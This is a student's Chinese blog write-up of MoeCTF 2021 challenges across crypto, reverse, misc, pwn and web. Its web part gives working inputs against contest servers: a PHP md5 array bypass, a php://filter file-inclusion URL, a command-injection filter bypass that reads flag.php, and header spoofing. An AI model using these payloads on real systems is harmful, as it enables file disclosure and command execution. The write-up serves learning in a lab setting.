MoeCTF NiceAsiv

最新推荐文章于 2025-04-01 09:04:23 发布
最新推荐文章于 2025-04-01 09:04:23 发布
阅读量2.7k 收藏 4
点赞数
分类专栏: ctf 文章标签: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50925658/article/details/120589846
版权

MoeCTF NiceAsiv

初次接触打CTF,经验也不足,WP的话就很偏小白,望大佬们轻点打(毕竟大一佬暴打大二菜鸡

这次主要做了做  ***Misc*** 和  ***Web***

我自己初次接触打CTF,经验也不足,WP的话就很偏小白,望大佬们轻点打(毕竟大一佬暴打大二菜鸡

(也可关注我的blog: NiceAsiv(交流)

目录

Crypto(3/14)

  1. Cryptography入门指北(略)
  2. beginOfCrypto
  3. LazyRSA

Reverse(4/14)

  1. 逆向工程入门指北(略)
  2. welcome_to_the_world_of_re

3.Realezpy

7.大佬请喝coffee

Classical Cryptography(3/6)

  1. Augustine’s Way

2.Augustine’s Way#2

3.Ez Vigenere

MISC(10/12)

  1. Misc入门指北(略)
  2. find_me
  3. Macross
  4. Homework
  5. flipflipflip
  6. White Album
  7. Phone Call
  8. 社工题
  9. 好 康 的
  10. easyForensics(比赛结束noah指导)
  11. R P G(比赛结束noah指导)
  12. 诺亚的日记

Pwn(3/11)

  1. Pwn入门指北(略)
  2. test_your_nc
  3. Int_overflow

Web(9/14)

  1. Web入门指北(略)
  2. Web安全入门指北—GET
  3. Web安全入门指北—小饼干
  4. 2048
  5. Web_Inc
  6. ezinclude
  7. babeRCE
  8. Do you know HTTP?

Crypto
02 beginOfCrypto
直接打开发现有对应关系,那就把字母表输出再对照着人工将output的内容还原(不容易哈,人工智能)

  • Flag

    moectf{c0me_on!begin_your_Crypt0_c4r33r}

Reverse
02 welcome_to_the_world_of_re
直接拖进 101editor 就能解

03 Realezpy

python逆向很难的啦,就找在线的啦

本来uncompyle6是可以轻松搞定的,结果一直出问题,索性在线反编译了

# uncompyle6 version 3.7.4
# Python bytecode 3.8 (3413)
# Decompiled from: Python 2.7.17 (default, Sep 30 2020, 13:38:04) 
# [GCC 7.5.0]
# Warning: this version of Python has problems handling the Python 3 "byte" type in constants properly.
import time
c = [119, 121, 111, 109, 100, 112, 123, 74, 105, 100, 114, 48, 120, 95, 49, 99, 95, 99, 121, 48, 121, 48, 121, 48, 121, 48, 95, 111, 107, 99, 105, 125]

def encrypt(a):
    result = []
    for i in range(len(a)):
        if ord('a') <= ord(a[i]) <= ord('z'):
            result.append((ord(a[i]) + 114 - ord('a')) % 26 + ord('a'))
        elif ord('A') <= ord(a[i]) <= ord('Z'):
            result.append((ord(a[i]) + 514 - ord('A')) % 26 + ord('A'))
        else:
            result.append(ord(a[i]))
    else:
        return result

ipt = input('Plz give me your flag:')
out = encrypt(ipt)
if len(ipt) != len(c):
    print('Wrong lenth~')
    exit()
else:
    for i in range(len(c))://32
        if out[i] != c[i]:
            print('Plz try again?')
            exit()
        else:
            print('Congratulations!!!')
            time.sleep(1)
            print('enjoy the beauty of python ~~~ ')
            import this

然后就是解码整出来flag

  • Flag

    flag我忘了,少年你来给我说吧

07 大佬请喝coffee

直接不管三七二十一逆向

import java.io.BufferedReader;
import java.io.InputStreamReader;

public class coffee {

   public static void main(String[] var0) {
      System.out.println("<---  moectf2021  --->");
      System.out.println(" [coffee] Welcome to moectf2021.");
      System.out.println("It will be quite ez for you. I guess.");
      System.out.print("Input your flag : ");
      String var1 = null;

      try {
         var1 = (new BufferedReader(new InputStreamReader(System.in))).readLine();
      } catch (Exception var3) {
         System.out.println("ERROR: Undefined Exception.");
      }

      if(var1.length() != 9) {
         System.out.println("QwQ. You are wrong.");
      } else {
         char[] var2 = var1.toCharArray();
         if(var2[0] * 4778 + var2[1] * 3659 + var2[2] * 9011 + var2[3] * 5734 + var2[4] * 4076 + var2[5] * 6812 + var2[6] * 8341 + var2[7] * 6765 + var2[8] * 7435 == 5711942 && var2[0] * 4449 + var2[1] * 5454 + var2[2] * 4459 + var2[3] * 5800 + var2[4] * 6685 + var2[5] * 6120 + var2[6] * 7357 + var2[7] * 3561 + var2[8] * 5199 == 4885863 && var2[0] * 3188 + var2[1] * 6278 + var2[2] * 9411 + var2[3] * 5760 + var2[4] * 9909 + var2[5] * 7618 + var2[6] * 7184 + var2[7] * 4791 + var2[8] * 8686 == 6387690 && var2[0] * 8827 + var2[1] * 7419 + var2[2] * 7033 + var2[3] * 9306 + var2[4] * 7300 + var2[5] * 5774 + var2[6] * 6588 + var2[7] * 5541 + var2[8] * 4628 == 6077067 && var2[0] * 5707 + var2[1] * 5793 + var2[2] * 4589 + var2[3] * 6679 + var2[4] * 3972 + var2[5] * 5876 + var2[6] * 6668 + var2[7] * 5951 + var2[8] * 9569 == 5492294 && var2[0] * 9685 + var2[1] * 7370 + var2[2] * 4648 + var2[3] * 7230 + var2[4] * 9614 + var2[5] * 9979 + var2[6] * 8309 + var2[7] * 9631 + var2[8] * 9272 == 7562511 && var2[0] * 6955 + var2[1] * 8567 + var2[2] * 7949 + var2[3] * 8699 + var2[4] * 3284 + var2[5] * 6647 + var2[6] * 3175 + var2[7] * 8506 + var2[8] * 6552 == 5970432 && var2[0] * 4323 + var2[1] * 4706 + var2[2] * 8081 + var2[3] * 7900 + var2[4] * 4862 + var2[5] * 9544 + var2[6] * 5211 + var2[7] * 7443 + var2[8] * 5676 == 5834523 && var2[0] * 3022 + var2[1] * 8999 + var2[2] * 5058 + var2[3] * 4529 + var2[4] * 3940 + var2[5] * 4279 + var2[6] * 4606 + var2[7] * 3428 + var2[8] * 8889 == 4681110) {
            System.out.println("Congratulations.");
            System.out.println("Here is your flag : moectf{" + var1 + "}");
         } else {
            System.out.println("You still need learn more!");
            System.out.println("Fighting!!!");
         }
      }    

   }
}

然后看到有多个线性方程组,直接提取放进matlab里面解,然后转化为ASCII

Classical Cryptography

01 Classical Cryptography
看着像凯撒密码,然后都是后移了一位,所以爆破了

02 Augustine’s Way#2

除了字母还把一些字符也纳入进来,但同样直接爆破

04 Ez Vigenere

维尼吉亚密码,大胆猜测密钥是moectf,然后去在线网站里面解密

Misc
02 find_me
把文件拖进***010editor*** 进行查看,Flag跃然于右边的文本(之前都用的winhex,没想到***010edito***r又经济又实惠,hs yyds)

  • Flag

    moectf{hs_g1v3_u_fl@g}

03 Macross
打开是一个以mrf为后缀名的文件,用百度搜了很久一直说是和mac系统相关连的文件格式,然后下了Fileview查看,看了个寂寞,只有我浪费了精力和希望,百度得了流量 然后上 Google 搜到是记录鼠标行为的数据文件(An MRF file is a data file created by Bartels Media Mouse Recorder),并找到下载相应的软件MacrossRecorder,然后打开 Windows 画图,运行文件并记录轨迹

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iaYAFPFL-1633183837302)(MoeCTF%20NiceAsiv%20fc388a30ccb14bba99988b6f56321c23/Untitled.png)]

  • Flag

    moectf{Rec0rder_15_Funny}

04 Homework
大致按照word隐写的流程走一下,将字体全调成红色,发现有一处有重叠的字符,直接复制然后找一个文本框得出flag{0h_U_,调整阅读视图或者在kali中打开发现了f1nd_m3!}的文本(或者清除格式也能看到),最终得到Flag

  • Flag

    moectf{0h_U_f1nd_m3!}

05 flipflipflip

这个题是真的恶心心(原谅我Noah大神)
104MB的字符串,用记事本打开(差点崩了),拉到最后看到标志性的***==***base64抬走伺候

然后就一路碰壁,软件解的答案不对,一千个软件有一千个结果 ,去网站解结果(网站直接玩崩溃)

最终在其中CyberChef网站能解,耗时(感谢BB的无私提供)

最终投向python脚本的怀抱,(这里感谢humor的帮助)

import base64
f= open("task3.txt",'r')
flag=f.readline()
for i in range(100):
    try:
        flag=base64.b64decode(flag)
    except Exception as e:
        flag=flag[::-1]
        flag=base64.b64decode(flag)
    try: ##后面添加的代码
        flag = flag.decode('ascii')
    except Exception as e:
        flag = base64.b64encode(flag)[::-1]
        flag = flag.decode('ascii')

print(flag[::-1])

因为用python解出来第一遍解出来是倒着的,顺序改了一下之后,再解发现又倒了所以在humor的指导下写了以上脚本,结果在解了10多遍就开始出错(后面问了诺亚,原因是有一些需要反转的被直接decode,导致后面出错,所以添加了后面代码终于好了)

其实我觉得cyberChef也可以解出来慢一点而已,特别注意出错就要自己调一下

  • Flag

    moectf{fffffflipppppp}

06 White Album
参考博客:

https://www.notion.so/MoeCTF-readme-txt-487c4f5e93764867b7aeead6a263c4ba#b8c0d9633d0e4bfe89ccd0fdb0f2672f

打开可以看到.png ,用kali打开图片,打不开(白屏),网上搜了一下,是图片宽高的问题,CRC爆破出原宽高(找到的脚本)

import zlib
import struct

filename = 'test.png'
with open(filename, 'rb') as f:
    all_b = f.read()
    crc32key = int(all_b[29:33].hex(),16)
    data = bytearray(all_b[12:29])
    n = 4095            #理论上0xffffffff,但考虑到屏幕实际/cpu,0x0fff就差不多了
    for w in range(n):          #高和宽一起爆破
        width = bytearray(struct.pack('>i', w))     #q为8字节,i为4字节,h为2字节
        for h in range(n):
            height = bytearray(struct.pack('>i', h))
            for x in range(4):
                data[x+4] = width[x]
                data[x+8] = height[x]
            crc32result = zlib.crc32(data)
            if crc32result == crc32key:
                print("宽为:",end="")
                print(width)
                print("高为:",end="")
                print(height)
                exit(0)

然后在010 Editor 里改它的宽高部分,得到完整图片,出现条码拿到在线二维码网站解码(后面得知是PDF417 介于二维码和条形码的一种码)

推荐网站: https://jiema.wwei.cn

  • Flag

    moectf{WhY_@r3_u_s0_5K1ll3D}

07 Phone Call
参考博客https://www.zhihu.com/question/19780683
这种题一就很复杂,拿到audacity看到将近21个峰(你家电话有那么长)

然后偶然发现一个网站,就起飞,嘿嘿嘿(咱没有手撕能力)

http://dialabc.com/sound/detect/index.html

再根据audacity给的间隔设置间隔符号就sucess了

  • Flag

    moectf{114514-1919810-7738-9634}

08 社工题
第一次接触社工题,网上搜了很多案例,然后想到上一届moectf wp留下了博客(嘿嘿其实直接bing noah 博客也可以找到)

找到NoahBox (noahtie.github.io) 只获得了https://masternoah.lofter.com/ lofter博客
当时在lofter博客中找到noahbox.github.io,(当时没注意后面复写一遍才发现不同)在里面留言板里找到了 HackerHS,最后找到第二个仓库根据意思在里面找到commits,发现莫尔斯电码,解码(网上有一些在线解的有问题,多找几个试试)下面是我找的一个摩尔斯电码工具

链接:https://pan.baidu.com/s/1KQlJp5OlWlBDClOiMx-jtA
提取码:qs31

  • Flag

    moectf{HAHAHAHAH_NOAH_IS_A_VEGETABLE_CHICKEN}

09 好 康 的

参考博客https://blog.csdn.net/weixin_50656679/article/details/108936650?ops_request_misc=%7B%22request%5Fid%22%3A%22163249925516780262529870%22%2C%22scm%22%3A%2220140713.130102334.pc%5Fblog.%22%7D&request_id=163249925516780262529870&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2blogfirst_rank_v2~rank_v29-24-108936650.pc_v2_rank_blog_default&utm_term=mkv&spm=1018.2226.300

播放发现在3分钟左右之后就不能播放,感觉有问题,用 mkvtoolnix 分离出来字幕和视频,拖进010 Editor 直接搜索 moectf ,找到flag

  • Flag

    moectf{N3v3r_90tt@_L3t-y0U_dOwN~}

10 easyForensics(比赛时没做出来)
用 AccessData FTK Imager 打开,游览找到 flag.mp4 ,非常惊喜,用各种办法尝试分析没得出任何信息(虽然发现有一些很奇怪的文件)

等到比赛结束的时候才知道不是这个文件(Noah设陷阱哈,比赛结束后在 FTK 里发现一些被删除的文件夹(Base64命名)还有一个python文件,全部导出来,然后用bat导出文件名

DIR *. * /B> LIST.TXT

看到python文件中有 data = data.replace("/", "_") 我们再将_全部换成/

再用base64解码(我用CyberChef)查看16进制结果,发现是个word,网上找脚本输出word得出flag

  • Flag

    moectf{Th@1s_N0t_U53FULL@_4LL}

11 R P G
这个我以为要修改数据通关数据,确实也是如此因为实在过不了关

Noah师傅传授的一种就是交换Data 里的Map001.json 和Map002.json 的文件名称,便可通过第一关拿到第一个字母,*往复循环*你就可以得到base64编码的一串字符串(秃了也变强了

其实打开map002.json,仔细查看便可以看到一列有规律的base64字符串,提取出来,反复解码,便得到Flag

  • Flag

    moectf{Th3_w0rld_0f_G4m3}

12 诺亚的日记

参考博客https://blog.csdn.net/qq_43625917/article/details/107723635?ops_request_misc=%7B%22request%5Fid%22%3A%22163250153316780269830444%22%2C%22scm%22%3A%2220140713.130102334…%22%7D&request_id=163250153316780269830444&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allfirst_rank_ecpm_v1~rank_v31_ecpm-2-107723635.pc_search_result_hbase_insert&utm_term=tshark+usb&spm=1018.2226.3001.4187

101editor打开,发现了wireshark字样,正好之前用过,结果数据里面没有Leftover Capture Data ,就百度到上面的博客,在kali中执行以下命令,结果空白格,~~大胆猜测不是我的问题是kali的问题 ,~~放到ubuntu里面分析,可以了(实际kali的tshark的版本问题)

tshark -r usb.pcap -T fields -e usb.capdata > usbdata.txt
tshark -r usb.pcap -T fields -e usb.capdata | sed '/^\s*$/d' > usbdata.txt #提取并去除空行

便提取到了usb的流量数据,然后用映射关系,将所做操作提取出来

normalKeys = {
    "04":"a", "05":"b", "06":"c", "07":"d", "08":"e",
    "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j",
     "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o",
      "13":"p", "14":"q", "15":"r", "16":"s", "17":"t",
       "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y",
        "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4",
         "22":"5", "23":"6","24":"7","25":"8","26":"9",
         "27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t",
         "2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\",
         "32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".",
         "38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>",
         "3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>",
         "44":"<F11>","45":"<F12>"}
shiftKeys = {
    "04":"A", "05":"B", "06":"C", "07":"D", "08":"E",
     "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J",
      "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O",
       "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T",
        "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y",
         "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$",
          "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")",
          "28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>",
          "2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"",
          "34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>",
          "3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>",
          "41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
output = []
keys = open('usbdata.txt')
for line in keys:
    try:
        if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
             continue
        if line[6:8] in normalKeys.keys():
            output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
        else:
            output += ['[unknown]']
    except:
        pass

keys.close()

flag=0
print("".join(output))
for i in range(len(output)):
    try:
        a=output.index('<DEL>')
        del output[a]
        del output[a-1]
    except:
        pass

for i in range(len(output)):
    try:
        if output[i]=="<CAP>":
            flag+=1
            output.pop(i)
            if flag==2:
                flag=0
        if flag!=0:
            output[i]=output[i].upper()
    except:
        pass

print ('output :' + "".join(output))
##结果2021nian<SPACE>8yue<SPACE>5ri<SPACE>,qing22<DEL><RET>zuotian<SPACE>gei<SPACE>hanshu<SPACE>fale<SPACE>caotu<SPACE>,cadai<DEL><DEL><DEL><DEL><DEL>odaooo<DEL><DEL>41tale<SPACE>,kaixin<SPACE><RET>yizhou<SPACE>meiyoukan<SPACE>jiaran=61de<SPACE>shipinle<SPACE>,nanshou<SPACE>nie1<RET>dongfangyaohe<SPACE>musedash<RET>liandongle<SPACE>,shuangchukuangxi<SPACE>[unknown][unknown]<DEL>chu=2[unknown][unknown]<RET>moectf<RET>de<SPACE>misc<RET>ti<SPACE>caichule<SPACE>4dao2,male<SPACE><RET>woxiang<SPACE>moyu2moyu<SPACE>mou<DEL>yu<SPACE><RET>d<DEL><GA>damedane	<RET>\<DEL>,<RET>dameyo<SPACE><RET>,<RET>damenanoyo<SPACE><RET><RET>xin2misc<RET>ti<SPACE>de<SPACE>flag<RET>xiangge3shengcao21yidiande<SPACE><RET>jiujiao<DEL><DEL><DEL><DEL>yo<DEL>ng<SPACE><SPACE>*moectf<RET>{}[unknown]D@m3daNe_D4me_yoooooo*[unknown][unknown][unknown]haole<DEL><DEL><DEL><DEL><DEL><SPACE>haole<SPACE>riji<SPACE>.<DEL>.txt<RET>

  • Flag

    moectf{D@m3daNe_D4me_yoooooo}

PWN

02 test_your_nc

nc pwn.blackbird.wang 9500

nc,想起来做web渗透时用过(nc命令,是一个简单可靠地网络工具)

所以按照题目说的(然后***ls***,看到有flag,直接用***cat***查看)
得到flag

  • Flag

    moectf{enjoy_the_netcat_and_the_shell}

03 Int_overflow

pwn.blackbird.wang 9501

nc pwn.blackbird.wang 9501
Do you no integer overflow?
Input an int ( <0 )
-1
But I want <0 now!
-1
You know int overflow!
ls
bin
dev
flag
intoverflow
lib
lib32
lib64
cat flag
moectf{y0ul0v3m3m3l0v3y0u_1nt0v3rfl0w}

  • Flag

    moectf{y0ul0v3m3m3l0v3y0u_1nt0v3rfl0w}

Web

02 Web安全入门指北—GET
用GET获取
http://47.93.215.154:10000/?moe=flag

03 Web安全入门指北—POST
Hackerbar 发个POST

04 Web安全入门指北—小饼干
FirefoxF12 把重发送GET,将header中的cookies里值改成1,发送

得到响应

  • Flag

    moectf{C00kie_1s_sw33t!}

05 2048

任意玩了几下,回显50000分才给你flag(果断不上当)
查看源代码发现这个

getFlag: function() {
var req = new XMLHttpRequest;
req.open("GET","flag.php?score="+obj.score,true);
req.onload = function() {
alert(this.responseText);
}
req.send();
}
}

发送GET

http://47.93.215.154:5001/flag.php?score=5000000000000
获得flag

  • Flag

    moectf{2048_1s_intere5t1ng!}

06 Web_Inc

https://blog.csdn.net/CSDNiamcoming/article/details/108837347

?php
error_reporting(0);
include_once "flag.php";
$a=$_GET['a'];
$b=$_POST['b'];
if(isset($a)){
    if($a!=$b&&md5($a)===md5($b)){//
        echo $flag;
    }else{
        echo 'try again';
    }
}else{
    highlight_file(__FILE__);
}

尝试用了数组绕过

http://47.98.215.112:78/?a[]=1

再用Hackbar 传post: b[]=2 直接接住flag

  • Flag

    moectf{xdsec3gf9dfg62fh342}

07 ezinclude

参考博客https://blog.csdn.net/vhkjhwbs/article/details/99728785

全程照抄网上的

http://47.98.215.112:5000/?file=php://filter/read=convert.base64-encode/resource=flag.php
得到base64字符串,解码Flag

  • Flag

    moectf{xdsec6asdgas7ahfsfaxczc}

08 babeRCE

参考博客https://www.cnblogs.com/0yst3r-2046/p/12600073.html

<?php
$rce = $_GET['rce'];
if (isset($rce)) {
if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
system($rce);
}else {
echo "hhhhhhacker!!!"."\n";
}
} else {
highlight_file(**FILE**);
}

审查代码看到cat more less nl tac等 都被过滤了,ls没被过滤,用burpsuite 进行监控,重发

[http://47.93.215.154:5000/](http://47.93.215.154:5000/)?rce=ls 发现了flag.php以及index.php,绝笔藏在flag,但不能直接看,那就绕过

rce=ca\t${IFS}fla\g.php ,得到flag

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-A4CJ0GJV-1633183837310)(MoeCTF%20NiceAsiv%20fc388a30ccb14bba99988b6f56321c23/Untitled%201.png)]

  • Flag

    moectf{Do_y0u_l1k3_Rcccccccccccccce?}

09 Do you know HTTP?

用BP将GET抓包下来,修改

HS / HTTP/1.1
Host: 47.93.215.154:5002
User-Agent: LT
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
X-Forwarded-For: 127.0.0.1
Referer: www.ltyyds.com

得到Flag

  • flag

    moectf{HTTPHeaders_1s_s0_ea5y!}

[MoeCTF 2021]Web安全入门指北—小饼干
2301_80323282的博客
03-28 363
因为热爱,所以长远!NSSCTF平台秉承着开放、自由、共享的精神,欢迎每一个CTFer使用。我直接传入VIP=1,发现没什么东西,我打开Burpsuite。我发现了有 VIP=0,这里我尝试将 0 改为 1。NSSCTF | 在线CTF平台。
Moectf-2020 WP by DeeBaTo
DeeBaTO的博客
10-08 1341
Reverse: ​ 逆向工程指北: 拉到底。 ​ Welcome to Re!:拖入IDA 按F5 ​ Thank you JavaScript:用webstorm打开 复制内容 去在线解码就出来了 Pwn: ​ Pwn从入门到入狱:mc打开文章里寻找 Algorithm: ​ mess:观察可以知道输出段中的英文字符是后面加入的,去掉英文字符后是ascii的码值 然后一一转换 Crypto: ​ crypto入门指北:打开txt寻找 ​ easy
MoeCTF 2021】地狱通讯
最新发布
XiaoHei的博客
04-01 233
第二个占位符访问其属性链,最终获取到模块全局变量。包含格式化占位符,可触发二次格式化,访问对象属性。:获取构造函数所在模块的全局变量字典,其中可能包含。函数处理,假设当参数不正确时返回一个对象实例。,响应中返回该字典内容,暴露真实flag。拼接到字符串中,形成新的格式化字符串。函数返回一个对象实例(如错误对象)。:获取类的构造函数方法。作为参数进行格式化,若。:全局变量字典中包含。
moectf 英国人
weixin_43939887的博客
09-13 401
题目: https://region.challenge.moectf.cn/ 系统基于“新式”的全局负载均衡器 (这题真的不需要花钱 打开题目,提示“Flag不在这儿,仅对英国和朝鲜区域提供服务” 根据题目关键字“全局负载均衡”,使用ping检测英国的服务器ip,http://www.webkaka.com/Ping.aspx,输入域名,位置选择英国,检测结果149.28.197.64 用...
2020moectf—flower
mishixiaodai的博客
11-07 420
在这里插入代码片@TOC flower 题目:moectf Re flower 运行程序,看程序是如何运作的,发现给了一首诗,还抛出了一个经典的不能在经典的一个问题。然后输入任意字符串,emm竟然被教育了一顿。 但看它的报错是提示我们输入的字符串太长,因此输入一个短的,看来这阅卷老师是真厉害,直接把我高中的底给透出来了。 直接奖励它给他拖入ida中,查找程序出现的字符串,发现了一处让人一看就兴奋的字符串。 直接查看它在代码段中的位置,并使用F5插件得到主函数的伪代码,通过分析,前面一串伪代码是判断你输入
moectf之绕过md5+同时向浏览器发送get、post请求。
admin的博客
09-20 1114
题目来源:moectf。 首先打开给出的网址:网址呈现的代码如下,而且题目中说了,提示我们绕过md5验证。 <?php error_reporting(0); include_once "flag.php"; $a=$_GET['a']; $b=$_POST['b']; if(isset($a)){ if($a!=$b&&md5($a)===md5($b)){ echo $flag; }else{ echo 'try ag..
NWUmoectf——web
LittleKeKe的博客
04-10 467
有几题值得深入学习 机器人 robots.txt文件是一个文本文件robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的。 让我们来弹一个flag 提交:<script>alert('flag')</script&g...
百度贴吧签到网站源码Java-moectf-wp:XDSEC协会2019招新赛moectf之xiaohuihuiWriteup
06-06
moeCTF author: xiaohuihui Sign In 你是西电新生嘛? XDSEC 2019招新信息放送群 614458628 加群时请务必注明姓名学号 其它学校选手请绕行!谢谢合作 此题是签到题,加入 招新群,在公告中即可找到flag信息 moectf{0...
MoeCTF 2024 Crypto Writeup
mata_lee的博客
10-16 2617
赌上菜鸡职业生涯的MoeCTF 2024 Crypto wp
MoeCTF2024-Web题解
qq_55038440的博客
10-11 1765
主要就是要利用python的Request库,来模拟登录,和访问签到页面,用户的密码和账号涉及加密AES,需要编写对应的加密函数,可以从js脚本中获得(将JS代码转换python代码)。Pickle反序列化时,会自动调用魔术方法__reduce__,该方法返回一个元组,可以执行任意代码,这里我采用将系统执行的结果反射到store的pets的值进行覆盖输出。引入base64的pickle的序列串,如下,然后刷新网页,即可得到flag。进入系统后,发现只有用户管理这个 页面的搜索功能可以使用,尝试源代码审计。
2019 moeCTF 部分WP
KurosawaRuby的博客
08-04 1090
2019moectf-WP 本次moectf的题目大多来说还是比较简单的,我们就里面的部分题来进行讲解 Sign In 这是moectf所特有的一个分类,我们知道往往签到题都放在Misc中,但是moectf却有一个单独的分类,难道这里面有什么蹊跷?我们一做便知! 题目描述 欢迎来到moeCTF 请加入QQ群825052189 签到题flag在群公告中 题目描述乍一看平平无奇,我们先加...
MoeCTF2023_Re
m0_75094067的博客
10-14 608
MoeCTF2023_Re
Moectf第二周
2303_81165358的博客
08-26 1189
脱壳打开moectf{ec5390dd-f8cf-4b02-bc29-3bb0c5604c29}就是flag。
2021西电MoeCTF
little_L_A的博客
09-27 2710
MOECTF新生赛wpwebweb_Lnc web web_Lnc 题目 <?php error_reporting(0); include_once "flag.php"; $a=$_GET['a']; $b=$_POST['b']; if(isset($a)){ if($a!=$b&&md5($a)===md5($b)){ echo $flag; }else{ echo 'try again'; } }else{ hi
Writeup-moectf-ezphp
DoubleLiii的博客
10-27 1101
moectf web方向一个题
MoeCTF2024--Crypto--Week1&Week2
2301_81161051的博客
11-04 1057
CTF Crypto MoeCTF2024--Crypto--Week1&Week2
MoeCTF 2021Re部分------Midpython.exe
寻梦&之璐
10-20 2763
Midpython.exe python代码写成的exe,进行反编译,先搞成pyc,然后把pyc反编译成py,但是再第二个步骤反编译成py的时候出现了如下报错: Traceback (most recent call last): File "g:\python3.7.6-64\lib\runpy.py", line 193, in _run_module_as_main "__main__", mod_spec) File "g:\python3.7.6-64\lib\runpy.py",
MoeCTF 2023 misc&web wp
Nanian233的博客
10-14 2010
moectf2023的web&misc部分wp
moectf2023学习笔记
Fab1an的博客
08-15 1958
也可以在这里改cookie的值。
moectf2023
08-19
moectf2023 是一个比赛或活动的名称,但在提供的引用内容中没有提及和解释这个名称的具体含义。根据给出的信息,引用中提到了一个关于 moeCTF 的信息,但是并没有提及到 moectf2023 这个特定的事件。引用是一段代码,与 moectf2023 也没有直接关联。引用中也没有提及到 moectf2023。 所以,根据提供的引用内容,无法确定 moectf2023 具体指的是什么。如果有其他相关的信息,请提供更多的细节,以便我能够给出更准确的回答。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [百度贴吧签到网站源码Java-moectf-wp:XDSEC协会2019招新赛moectf之xiaohuihuiWriteup](https://download.csdn.net/download/weixin_38606294/19412604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [MoeCTF2022 部分Crypto 复现](https://blog.csdn.net/Luiino/article/details/127702178)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值